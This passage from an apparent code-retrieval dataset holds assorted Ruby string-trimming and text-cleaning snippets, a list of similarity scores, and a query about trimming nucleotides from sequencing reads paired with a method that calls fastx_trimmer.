when 1\n # at line 948:30: ( '\\\\r' )? '\\\\n'\n # at line 948:30: ( '\\\\r' )?\n alt_46 = 2\n look_46_0 = @input.peek( 1 )\n\n if ( look_46_0 == 0xd )\n alt_46 = 1\n end\n case alt_46\n when 1\n # at line 948:30: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n end\n\n when 2\n # at line 949:5: '/*' ( . )* '*/'\n match( \"/*\" )\n # at line 949:10: ( . )*\n while true # decision 48\n alt_48 = 2\n look_48_0 = @input.peek( 1 )\n\n if ( look_48_0 == 0x2a )\n look_48_1 = @input.peek( 2 )\n\n if ( look_48_1 == 0x2f )\n alt_48 = 2\n elsif ( look_48_1.between?( 0x0, 0x2e ) || look_48_1.between?( 0x30, 0xffff ) )\n alt_48 = 1\n\n end\n elsif ( look_48_0.between?( 0x0, 0x29 ) || look_48_0.between?( 0x2b, 0xffff ) )\n alt_48 = 1\n\n end\n case alt_48\n when 1\n # at line 949:10: .\n match_any\n\n else\n break # out of loop for decision 48\n end\n end # loop for decision 48\n match( \"*/\" )\n\n when 3\n # at line 950:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\n' | '\\\\r' )+\n # at file 950:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\n' | '\\\\r' )+\n match_count_49 = 0\n while true\n alt_49 = 2\n look_49_0 = @input.peek( 1 )\n\n if ( look_49_0.between?( 0x9, 0xa ) || look_49_0.between?( 0xc, 0xd ) || look_49_0 == 0x20 || look_49_0 == 0xa0 )\n alt_49 = 1\n\n end\n case alt_49\n when 1\n # at line \n if @input.peek( 1 ).between?( 0x9, 0xa ) || @input.peek( 1 ).between?( 0xc, 0xd ) || @input.peek(1) == 0x20 || @input.peek(1) == 0xa0\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n else\n match_count_49 > 0 and break\n eee = EarlyExit(49)\n\n\n raise eee\n end\n match_count_49 += 1\n end\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 106 )\n\n end",
"def fix_lone_percent_signs(string_to_fix)\n if LONE_PERCENT_SIGN =~ string_to_fix.to_s\n string_to_fix.gsub!(LONE_PERCENT_SIGN, \"%25\")\n end\n end",
"def smart_truncate(len = 30, ending = '...')\n len = Math.max(len, 5)\n return self if self.length <= len\n s = self[0...(len-2)].reverse\n bits = s.split(/[\\s\\-,]/,2)\n s = bits.length == 2 ? bits[1] : bits[0]\n s.reverse + ending\n end",
"def extract_reject_long_strings(path)\n\t\tdata_array = []\n\t\thtml = File.read(path)\n\t\tdoc = Nokogiri::HTML(html)\n\t\telems = doc.search \"[text()*='ISBN']\"\n\t\tif !elems.first.nil?\n\t\t\tif elems.first.to_s.length < 220\n\t\t\t\telem = elems.first.parent\n\t\t\telse\n\t\t\t\telem = elems.last.parent\n\t\t\tend\n\t\telse\n\t\t\telem = ''\n\t\tend\n\t\told_elem = elem\n\t\tfoward = true\n\n\t\twhile elem.to_s != ''\n\t\t\tparsed_elem = Nokogiri::HTML(elem.to_s)\n\t\t\tresult_elem = (parsed_elem.xpath(\"//text()\").to_s).gsub(\"\\n\", \" \").to_s.gsub(/ +/, \" \").force_encoding(\"utf-8\")\n\t\t\tif result_elem.length < 220\n\t\t\t\tdata_array.push(result_elem)\n\t\t\tend\n\t\t\tif foward\n\t\t\t\tif elem.next_element.to_s != ''\n\t\t\t\t\telem = elem.next_element\n\t\t\t\telse\n\t\t\t\t\telem = old_elem.previous_element\n\t\t\t\t\tfoward = false\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tif elem.previous_element.to_s != ''\n\t\t\t\t\telem = elem.previous_element\n\t\t\t\telse\n\t\t\t\t\telem = ''\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tdata_array\n\tend",
"def adj_read_bases\n # mapping quality after '^' symbol is substituted\n # to avoid splitting at non indel + or - characters\n # read ends marking by '$' symbol is substituted\n # insertion and deletion marking by '*' symbol is substituted\n self.read_bases.gsub!(/\\^./, '')\n self.read_bases.delete! '$'\n self.read_bases.delete! '*'\n # warn about reads with ambiguous codes\n # if self.read_bases.match(/[^atgcATGC,\\.\\+\\-0-9]/)\n # warn \"Ambiguous nucleotide\\t#{self.read_bases}\"\n # end\n end",
"def filter new_text\n allowed_length = [LENGTH_LIMIT - text.length, 0].max\n new_text[0, allowed_length]\n end",
"def shortened_tweet_truncator(tweet)\n selective_tweet_shortener(tweet)\n if tweet.length >= 140\n tweet[0...137].concat(\"...\") #(...) is 3 characters!\n else\n tweet if tweet.length < 140\n end\nend",
"def normalize_string_reason(reason)\n reason.scan(/(x[1-4])/)\n end",
"def clean_numbers(original)\n number = original.delete(\"()-. \")\n\n if number.length == 10\n\n elsif number.length == 11\n if number.start_with?(\"1\")\n number = number[1..-1]\n else\n number = INVALID_PHONE\n end\n\n else\n number = INVALID_PHONE\n end\n return number\n end",
"def link_check\n check = false\n if self.message.include? \"http://\"\n check = true\n elsif self.message.include? \"https://\"\n check = true\n else\n check = false\n end\n\n if check == true\n arr = self.message.split\n index = arr.map{ |x| x.include? \"http\"}.index(true)\n self.link = arr[index]\n if arr[index].length > 23\n arr[index] = \"#{arr[index][0..20]}...\"\n end\n\n self.message = arr.join(\" \")\n end\n end",
"def extra_clean_str(str)\n str = str.downcase.gsub @extra_ua_filter, ''\n str = str.gsub(/[^\\x20-\\x7F]/, '')\n str.strip\n end",
"def shorter\n shorten(6)\n end",
"def cutoff(str, limit = 100)\n if str.length > limit\n str[0, limit] + '...'\n else\n str\n end\n end",
"def normalise_alt_spelling(header_name)\n # Run alt spelling regex against header\n spell_match = self.class.alt_spelling_header_regex.match header_name\n if spell_match\n # Set header name as AltSpelling# where # is num\n norm_header_name = 'altspelling' + spell_match[1]\n return norm_header_name\n end\n nil\n end",
"def find_shortest_failure(str, &block)\n unless call_fails(str, &block)\n raise \"hey, the input didn't fail!\"\n else\n # Chop off stuff from the beginning and then the end\n # until it stops failing\n bad = str\n 0.upto(bad.length) {|index|\n bad.length.downto(1) {|length|\n begin\n loop {\n s = bad.dup\n s[index,length] = ''\n break if bad == s\n break unless call_fails(s, &block)\n bad = s\n }\n rescue IndexError\n break\n end\n }\n }\n raise \"shortest failure is #{bad.inspect}\"\n end\n end",
"def selective_tweet_shortener(string)\n if string.length < 140 \n string\n else \n word_substituter(string)\n end\nend"
] |
[
"0.48733142",
"0.47056305",
"0.47010913",
"0.47010913",
"0.46958846",
"0.46873704",
"0.4680276",
"0.45950803",
"0.45738348",
"0.45472252",
"0.45407587",
"0.4518334",
"0.4510734",
"0.44531837",
"0.44484276",
"0.44479308",
"0.44177917",
"0.43902066",
"0.43876725",
"0.43861017",
"0.43770093",
"0.43733704",
"0.43684667",
"0.43677786",
"0.43622822",
"0.4358423",
"0.43522587",
"0.43481418",
"0.4343708",
"0.43425342",
"0.4332642",
"0.43299788",
"0.4320891",
"0.4320043",
"0.4318949",
"0.42955625",
"0.42883274",
"0.42878988",
"0.42878988",
"0.4273129",
"0.42711413",
"0.42606264",
"0.42467183",
"0.42405686",
"0.42324325",
"0.42305264",
"0.42292213",
"0.4224277",
"0.4218821",
"0.4215398",
"0.42148706",
"0.4213198",
"0.4212404",
"0.42122552",
"0.4209172",
"0.42044073",
"0.42033714",
"0.41992903",
"0.41981542",
"0.41968367",
"0.41944757",
"0.41829324",
"0.41746694",
"0.4168564",
"0.41628957",
"0.41591048",
"0.41573793",
"0.4156311",
"0.4148923",
"0.41435063",
"0.41410366",
"0.4137648",
"0.41355795",
"0.41341525",
"0.41312942",
"0.41263855",
"0.41230232",
"0.412051",
"0.41186845",
"0.41156295",
"0.41121903",
"0.41109002",
"0.41072685",
"0.41064242",
"0.41004437",
"0.40885416",
"0.40871128",
"0.40853068",
"0.4084806",
"0.40837336",
"0.4082013",
"0.40813568",
"0.40813106",
"0.40769586",
"0.4076219",
"0.40735376",
"0.40712357",
"0.4067989",
"0.40598845",
"0.40592673"
] |
0.66380143
|
0
|
Trims nucleotide from the 5' end of each read Returns nothing
|
def trim
return if skip_step?(@names.get('trim'), 'trimming')
run_cmd(\
'fastx_trimmer -Q33 -f 2' \
" -i #{@names.get('clip')}" \
" -o #{@names.get('trim')}"
)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def trim(n)\r\n @text = @text[n..-1] || \"\"\r\n end",
"def trim\n repeat_until_unchanged(&:trim_once)\n end",
"def _strip seq\n seq.shift while (tok = seq.first) && tok.type == :endline\n end",
"def rstrip!() end",
"def drop_from_each_line(n)\n self.lines.map do |line|\n k = 0\n line.chars.drop_while do |x|\n k += 1\n k <= n && x != \"\\n\"\n end.join(\"\")\n end.join(\"\")\n end",
"def strip!() end",
"def rstrip() end",
"def adj_read_bases\n # mapping quality after '^' symbol is substituted\n # to avoid splitting at non indel + or - characters\n # read ends marking by '$' symbol is substituted\n # insertion and deletion marking by '*' symbol is substituted\n self.read_bases.gsub!(/\\^./, '')\n self.read_bases.delete! '$'\n self.read_bases.delete! '*'\n # warn about reads with ambiguous codes\n # if self.read_bases.match(/[^atgcATGC,\\.\\+\\-0-9]/)\n # warn \"Ambiguous nucleotide\\t#{self.read_bases}\"\n # end\n end",
"def auto_trim!; end",
"def trim(n)\n result = self\n while n > 0 && !result.empty?\n result = result.tail\n n -= 1\n end\n result\n end",
"def strip() end",
"def trim(start_nt, end_nt, ref_option = :HXB2, path_to_muscle = false)\n seq_hash = self.dna_hash.dup\n seq_hash_unique = seq_hash.uniq_hash\n trimmed_seq_hash = {}\n seq_hash_unique.each do |seq, names|\n trimmed_seq = ViralSeq::Sequence.new('', seq).sequence_clip(start_nt, end_nt, ref_option, path_to_muscle).dna\n names.each do |name|\n trimmed_seq_hash[name] = trimmed_seq\n end\n end\n return_seq_hash = self.dup\n return_seq_hash.dna_hash = trimmed_seq_hash\n return return_seq_hash\n end",
"def five_prime_utr_seq\n return self.seq[0, self.coding_region_cdna_start - 1]\n end",
"def strip_text_unique(passage)\n strip_text(passage).uniq#unique\nend",
"def skip\n @str.slice! @last_re if peek_next_type != :eos\n end",
"def no_auto_trim!; end",
"def sample_and_remove(n)\n samples = sample(n)\n @content -= samples\n samples\n end",
"def strip_excess_words(content_player_id)\n\t\tself.played_words.each do |value|\n\t\t\tif value.t != self.t - 1 \n\t\t\t\tvalue.t_l.clear \n\t\t\tend\n\t\tend\t\n\tend",
"def remove_non_amino_acids(sequence)\n sequence.gsub(Nonstandard_AA_re, '')\n end",
"def spin_words (words)\n word = words.split(\" \")\n word.each do |item|\n if item.length >= 5\n item.reverse!\n end\n end\n return word.join(\" \")\nend",
"def digester(string, missed_cleavages) # Returns an array of chomped sequences\n\tstring.upcase!\n\tarr = (0..(string.upcase.length-1)).map {|i| string[i]}\n\tmisses = 0; splits = []\n\t(0..missed_cleavages).each do |miss_cleav|\n\t\t(0..missed_cleavages).each do |init_num|\n\t\t\tlast, curr, next_item = nil, nil, nil; keeper = \"\"\n\t\t\tmisses = init_num\n\t\t\tarr.each_index do |i|\n\t\t\t\tlast = arr[i-1]; curr = arr[i]; next_item = arr[i+1]\n\t\t#\tputs \"last, curr, next: #{last}, #{curr}, #{next_item}\"\n\t\t\t\tkeeper << curr if curr\n\t\t#\tputs \"keeper: #{keeper}\"\n\t\t\t\tif curr == 'R' or curr == 'K'\n\t\t\t\t\tunless next_item == \"P\"\n\t\t#\t\t\t\tputs \"misses:missed cleavages\t\t\t#{misses}:#{miss_cleav}\"\n\t\t\t\t\t\tif misses < miss_cleav\n\t\t\t\t\t\t\tmisses += 1\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\tsplits << keeper\n\t\t\t\t\t\t\tkeeper = \"\";\tmisses = 0\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tsplits << keeper if next_item == nil\n\t\t#\t\tputs \"Splits looks like: #{splits}\"\n\t\t\tend\n\t\tend\t\t\t\n\tend\n\tsplits.uniq\nend",
"def validate_nucleuotides!(dna)\n invalid = dna.chars.uniq - VALID_NUCLEOTIDE\n raise ArgumentError unless invalid.empty?\n end",
"def delete_ending(word)\n word_size = word.size\n if word_size <= 3\n return word\n else\n 3.downto(1).each do |i|\n ending = word.last(i)\n if @rus_endings.include?(ending)\n return word[0, word_size - i]\n end\n end\n end\n\n word\n end",
"def lstrip!() end",
"def stripInterchange(interchangeName)\n interchangeName[11..-5]\nend",
"def read_auto_clean_up; end",
"def trimmed_names \n trimmed_names = []\n raw_names.each do |name|\n article_trim_strings.each do |trim| #Remove all trim words from name\n name = !name.index(trim).nil? ? name.sub(trim, \"\") : name\n end\n name = name.strip\n if(name.length > 5)\n\ttrimmed_names << name #Add trimmed name to the list\n end\n end\n trimmed_names\n end",
"def doing_raw_file_to_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.read(\"../../Documents/20111224-research.txt\")\n\t new = a.to_textual\n#TODO finishe\t \n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 50 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def cutinfo(string)\n inf=/\\024/=~string1\n inf=inf+2\n trans=string1[inf..-1]\nend",
"def remove(s)\np x = s.split(\"\")\nif x.last === \"!\"\nz = x.pop\np x.join(\"\")\nelsif x.last != \"!\"\np x.join(\"\")\nend\nend",
"def remove_duplicates_recursivly (phrase, important, string)\n\ttype = [\"\"]\n\tremovables = [\"CC\", \",\"]\n\tphrase.each do |sub|\n\t\tif sub.exact_tag?(type)\n\t\t\t# it is a repetition\n\t\t\tif delete.empty?\n\t\t\t# If it is the first repetition, check the first\n\t\t\t# done to avoid checking every entity if in important\n\t\t\t\tdelete[!arr_in_phrase(important, sub.to_s)]\n\t\t\tend\n\t\t\t# save it\n\t\t\tsame << sub.to_s\n\t\t\tdelete << !arr_in_phrase(important, sub.to_s)\n\n\t\telsif sub.exact_tag?(removables)\n\t\t\t# it is not a repetition, but it is a connector of some sort (\",\" \"or\" \"and\" maybe something else?)\n\t\t\tto_remove = sub.to_s\n\t\telsif !sub.exact_tag?(removables)\n\t\t\t# not a repetition\n\t\t\tif !same.empty? && delete.any?{|boolean|boolean}\n\t\t\t\t# delete unnecessary information\n\t\t\t\t# need to implement: sub! every true and its left removable (from to_remove) and spaces by a space\n\t\t\t\t# if there is only one true, delete all removables\n\t\t\t\t# elsif the last one is false put its left removable (from to_remove)\n\t\t\t\t# before the last undeleted string, and delete the other removable so there wont be 2 of them. (example: one, two and three -> delete three -> one and two)\n\t\t\tend\n\t\t\tsame = [sub.to_s]\n\t\t\tdelete = []\n\t\t\tif sub.has? :tag\n\t\t\t\ttype = sub.tag\n\t\t\tend\n\t\tend\n\t\tstring = remove_duplicates_recursivly(sub, important, string)\n\tend\nend",
"def read_content(content)\n unless content.empty?\n content.gsub(/-{3}.*-{3}\\n/m, '')\n end\n end",
"def auto_trim?; end",
"def remove(n = 1)\n left(n)\n @text.slice!(@cursor, n)\n end",
"def trim_requested; end",
"def get_sandwich(string) # return whatever is between the bread\n return \"\" if string.scan(/bread/).length != 2\n new_str = \"\"\n (string.size-4).times do |i|\n if string[i..i+4] == 'bread'\n val = i+5\n until string[val..val+4] == 'bread'\n new_str += string[val]\n val += 1\n end\n break\n end\n end\n return new_str\nend",
"def trim_stream\n trimmed = @stream.lstrip\n\n return if trimmed.nil?\n\n @stream_char += (@stream.length - trimmed.length)\n @stream = trimmed\n end",
"def check_csfasta(fasta)\n # length is the total read lengh + 2\n # cat *.csfasta | perl -ne 'next if /^#/;$i++;if ($i%2==0) {print unless \n # length($_)==52} else {print unless /^>\\d+_\\d+\\_\\d+\\_(F|R)(3|5)(-P2)*\\n$/}'\n # | more\n length = get_bp_length(fasta) + 2\n i = 0\n output = \"\"\n File.open(fasta).each do |l|\n next if /^#/.match(l)\n i = i + 1\n if ( i % 2 == 0 ) && ( l.size != length ) &&\n !/^>\\\\d+_\\\\d+_\\\\d+_(F|R)(3|5)(-P2)*\\n$/.match(l)\n output = output + l\n end\n end\n output\n end",
"def remove_reluctant(strio)\r\n return if strio.eof?\r\n if (ch=strio.getc) == ??\r\n #Do nothing\r\n else\r\n strio.ungetc(ch)\r\n end\r\nend",
"def pirates_say_arrrrrrrrr(string)\n\tarray_1 = string.downcase.split\"\"\n\tarray_2 = []\n\nloop do \n\tarrr = array_1.index(\"r\")\n\tbreak if arrr == nil\n\tarray_1.delete_at(arrr)\n\tarray_2 << array_1[arrr]\n\t\nend\n\narray_2.join\n\nend",
"def complement(nucleotide)\n case nucleotide\n when \"A\"\n \"T\"\n when \"T\"\n \"A\"\n when \"G\"\n \"C\"\n when \"C\"\n \"G\"\n end\nend",
"def read_wide\r\n self[/^.*?(?=\\x00{2})/].delete(0.chr)\r\n end",
"def cleanup_noreg(string)\n blocks = string.split\n result = blocks.map do |word|\n word = word.chars.map! do |char|\n if char.downcase == char.downcase.upcase\n ' '\n else \n char\n end\n end\n word = word.join\n # p word\n #p word.squeeze(\" \")\n #word.squeeze(\" \")\n # take note that here +*& is a block or word, and gets replaced by a space without\n # any contiguous letter chars\n # so after join on line 48, there are 3 spaces between my and line, without the squeeze call\n word\n end\n result = result.join(' ').squeeze(' ')#.squeeze\nend",
"def doing_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.readlines(\"./tmp/insert_researches.txt\")\n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 52 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def spinWordsAlt( string )\n #Split words in the string into an array\n words = string.split(' ')\n for i in ( 0...words.length() ) do\n if words[i].length() >= 5\n words[i] = reverse( words[i] )\n end\n end\n return words.join(' ')\nend",
"def skip n=1\r\n\t\tif !@buffer then return nil end\r\n\t\t@buffer= @buffer[n..-1]\r\n\t\tif !@buffer then nl end\r\n\t\tif !@buffer then return nil end\r\n\t\t@buffer.lstrip!\r\n\t\t@col=@max-@buffer.length+1\r\n\t\tif (@buffer.lstrip==\"/n\" || @buffer.lstrip==\"\") then nl end\r\n end",
"def prune_string(string)\n string.chomp.slice(0..pruned_width)\n end",
"def solo5(arr)\n\tarr.delete_if {|sup| sup.include?(\" \")} \n\t#p zombie_apocalypse_supplies\nend",
"def getsandwich(str)\n bread = false\n inbetween= \"\"\n breadcount = 0\n (str.size-4).times do |n|\n if str[n..n+4] == 'bread'\n breadcount += 1\n end\n end\n if breadcount != 2\n return \"\"\n end\n str.size.times do |b|\n slice = str[b..b+4]\n if slice == \"bread\"\n bread = !bread\n end\n if bread == true\n inbetween += str[b]\n end\n end\n return inbetween[5...inbetween.size]\nend",
"def clean_digit_lines(separated_digit_lines)\n separated_digit_lines.each do |chunk|\n chunk.delete_at(3)\n if chunk[0].length == 0\n chunk[0] = \" \"\n end\n end\nend",
"def get_sandwich(str) # needs some work\n (str.size - 4).times do |i|\n slice = str[i..(i + 4)]\n if slice != \"bread\"\n puts slice\n end\n end\n\nend",
"def spinWords(string)\r\n \r\n var= string.split(' ') #[\"Hey\", \"fellow\", \"warriors\"]\r\n finalarry=[]\r\n var.each do |x|\r\n arry= x.split('') \r\n if arry.count >= 5\r\n finalarry << arry.reverse\r\n else\r\n finalarry<< arry\r\n end\r\n\r\n \r\n end\r\n \r\n lastarry=[]\r\n finalarry.each do |y|\r\n lastarry << y.join(\"\")\r\n \r\n end\r\n \r\n result= lastarry\r\n p result.join(' ')\r\n\r\n\r\n \r\n \r\nend",
"def trim_id3v1_string(str)\n str.tr(\"\\x00\".b, '').strip\n end",
"def idle_trim?; end",
"def wash_row(s)\n i = s.index(')')\n raise \"line in file phrases.ini does not contain )\" if i == nil\n return s.slice(i+1..-1).strip.upcase\n # slice vraci oznaceny substring\n # slice! vraci zbytek stringu\nend",
"def crunch(string)\n non_consecutive = ''\n\n string.chars.each do |char|\n non_consecutive << char if char != non_consecutive[-1]\n end\n\n non_consecutive\nend",
"def lstrip() end",
"def read_input_ignore_empty\n attempts = 0\n input = \"\"\n begin\n attempts = attempts + 1\n input = read_input\n end while input == \"\" && attempts < 5\n return input\n end",
"def non_repeating3(str)\n set = Set.new\n str.each_char do |char|\n return char unless set.add?(char)\n end\nend",
"def spin(string)\n spin = string.split(' ').map { |s| s.length >= 5 ? s.reverse : s }\n spin.join(' ')\nend",
"def custom_squeeze(string)\n # characters = []\n # p characters = sentence.chars\n characters = string.chars\n eos = characters.length - 1\n return_string = \"\"\n # p return_string << characters[2]\n\n characters.each_with_index do |char, index|\n unless char == characters [index + 1] then return_string << characters[index]\n # puts \"char = #{char}\"\n # puts \"index = #{index}\"\n # puts \"characters from index = #{characters [index + 1]}\"\n # puts \"eos = #{eos}\"\n # puts \"return_string = #{return_string << characters[index]}\"\n # puts\n # else\n # puts \"Found repeating char #{char} at index #{index + 1}! \\n Removing repeating character!\"\n # puts\n end\n end\n return return_string\nend",
"def remove_duplicates(str)\n uniques = \"\"\n\n str.each_with_index do |ltr, i|\n uniques << ltr unless str[0..i - 1].include?(ltr)\n end\n\n uniques\nend",
"def spinWords(string)\n array_of_words = string.split(\" \")\n array_of_words.each do |word|\n if word.length >= 5\n word.reverse!\n end\n end\n return array_of_words.join(\" \")\nend",
"def rstrip!\n erase! @result.length - 1 - (@result.rindex(/[^\\s]/) || -1)\n end",
"def get_the_word\n words = File.readlines(\"5desk.txt\")\n words = words.map do |word|\n word.strip\n end\n words = words.select do |word|\n (word.length > 4) && (word.length < 13)\n end\n words.sample.upcase.split(\"\")\n end",
"def trim(seqses)\n # Avoid truly horrific quadratic behavior. TODO: I think there\n # may be a way to get perfect trimming without going quadratic.\n return seqses.flatten(1) if seqses.size > 100\n\n # Keep the results in a separate array so we can be sure we aren't\n # comparing against an already-trimmed selector. This ensures that two\n # identical selectors don't mutually trim one another.\n result = seqses.dup\n\n # This is n^2 on the sequences, but only comparing between\n # separate sequences should limit the quadratic behavior.\n seqses.each_with_index do |seqs1, i|\n result[i] = seqs1.reject do |seq1|\n # The maximum specificity of the sources that caused [seq1] to be\n # generated. In order for [seq1] to be removed, there must be\n # another selector that's a superselector of it *and* that has\n # specificity greater or equal to this.\n max_spec = _sources(seq1).map do |seq|\n spec = seq.specificity\n spec.is_a?(Range) ? spec.max : spec\n end.max || 0\n\n result.any? do |seqs2|\n next if seqs1.equal?(seqs2)\n # Second Law of Extend: the specificity of a generated selector\n # should never be less than the specificity of the extending\n # selector.\n #\n # See https://github.com/nex3/sass/issues/324.\n seqs2.any? do |seq2|\n spec2 = _specificity(seq2)\n spec2 = spec2.begin if spec2.is_a?(Range)\n spec2 >= max_spec && _superselector?(seq2, seq1)\n end\n end\n end\n end\n result.flatten(1)\n end",
"def no_idle_trim!; end",
"def without_garbage\n reg = Regexp.new /[#{String.characters.join}]+/\n self.scan(reg).join(\"\").gsub(\"\\n\", \" \").gsub(\"|\", \" \").gsub(\"-\", \" \")\n end",
"def strip(tags=TagLib::FLAC::File::AllTags)\n end",
"def erase!(chars)\n return if chars == 0\n str = @result.slice!(-chars..-1)\n newlines = str.count(\"\\n\")\n if newlines > 0\n @line -= newlines\n @offset = @result[@result.rindex(\"\\n\") || 0..-1].size\n else\n @offset -= chars\n end\n end",
"def remove_inserts\n\n currseq = \"\"\n currname = \"\"\n # TODO: extract this from all methods to a helper class \n @content.each do |line|\n # if name anchor is found start a new bin\n if (line =~ /^>(.*)/)\n # check if we found next bin\n if (currseq.length > 0)\n # push name and sequence to containers\n @names << currname\n @seqs << currseq\n end\n # name is found next to anchor\n currname = $1\n # no sequence data yet\n currseq = \"\"\n else\n # append sequence data\n currseq += line\n end \n end \n # collect the data from the last bin\n if (currseq.length > 0)\n @names << currname\n @seqs << currseq\n end\n \n match_cols = []\n \n # Determine which columns have a gap in first sequence (match_cols = false)\n residues = @seqs[0].unpack(\"C*\")\n residues.each_index do |num|\n if (residues[num] == 45 || residues[num] == 46)\n match_cols[num] = false\n else\n match_cols[num] = true\n end\n end\n \n # Delete insert columns\n @names.each_index do |i|\n # Unpack C : 8-bit unsigned integer , push -> Array\n residues = @seqs[i].unpack(\"C*\")\n seq = \"\"\n # traverse over Integer Representation\n residues.each_index do |num|\n # If the base Sequence has no gap then check current sequence \n if (match_cols[num])\n if (residues[num] == 45 || residues[num] == 46)\n # Add gap to Sequence\n seq += \"-\"\n else\n # Add the Residue to Sequence\n seq += residues[num].chr\n end \n end \n end\n # Remove anchoring String Characters\n seq.tr!('^a-zA-Z-','')\n # Push an Upper Case representation to the @seqs array\n @seqs[i] = seq.upcase\n # Check whether all sequences have same length as parent\n if (@seqs[i].length != @seqs[0].length)\n logger.debug \"ERROR! Sequences in alignment do not all have equal length!\"\n end\n end\n end",
"def keep(numbers)\r\nreturn numbers.drop_while { |x| x <= 4 }\r\nend",
"def pick_secret_word\n\t\tFile.read(\"5desk.txt\").lines.select {|word| (4..9).cover?(word.size)}.sample.strip\n\tend",
"def test_tilde_remover\n parser = TancParser.new(\"#{File.dirname(__FILE__)}/../testdata/tanc-1.txt\")\n line_b = \"試験 結果発表~ も 恙無い{つつがなく}~ 終わる{終わって} 当面[01]{当面の} 視点 が 自然[02]{自然と} 夏休み に 集まる{集まって} 来る(くる){くる} でしょう{でしょ}\"\n references_array = line_b.split($delimiters[:tanc_refs_array])\n processed_references_array = []\n references_array.each do |ref|\n data = parser.class.process_reference(ref)\n processed_references_array << data if !data.empty?\n end\n assert_equal(\"結果発表\",processed_references_array[1][:index_word],\"Tilde remover not working\")\n assert_equal(\"恙無い\",processed_references_array[2][:index_word],\"Tilde remover not working\")\n end",
"def pirates_say_arrrrrrrrr(string)\n array_1 = string.downcase.split\"\"\n array_2 = []\n \n loop do\n arrr = array_1.index(\"r\")\n break if arrr == nil\n array_1.delete_at(arrr)\n array_2 << array_1[arrr]\n end\n \narray_2.join\n\nend",
"def spin_words (words)\n list = words.split(\" \")\n final = []\n for item in list do\n if item.chars.length >= 5\n final << item.chars.reverse\n final << \" \"\n else\n final << item\n final << \" \"\n end\n end\n return final.join.strip\nend",
"def black_spot(line)\n parts = line.chomp.split(\"|\")\n\n @names = parts[0].split(\" \")\n @count = parts[1].strip.to_i\n\n until @names.length == 1\n current_index = 0\n until @count == current_index\n @names.each_with_index do |name, index|\n current_index += 1\n if current_index == @count\n @names.delete_at(index)\n break\n end\n end\n end\n end\n\n puts @names[0]\n\nend",
"def slurp_remaining_bird_tracks(lines)\n tracked_lines = []\n\n while lines.first =~ BIRD_TRACKS_REGEX\n tracked_lines << remove_bird_tracks(lines.shift)\n end\n\n if tracked_lines.empty?\n \"\"\n else\n \"\\n\" + tracked_lines.join(\"\\n\")\n end\n end",
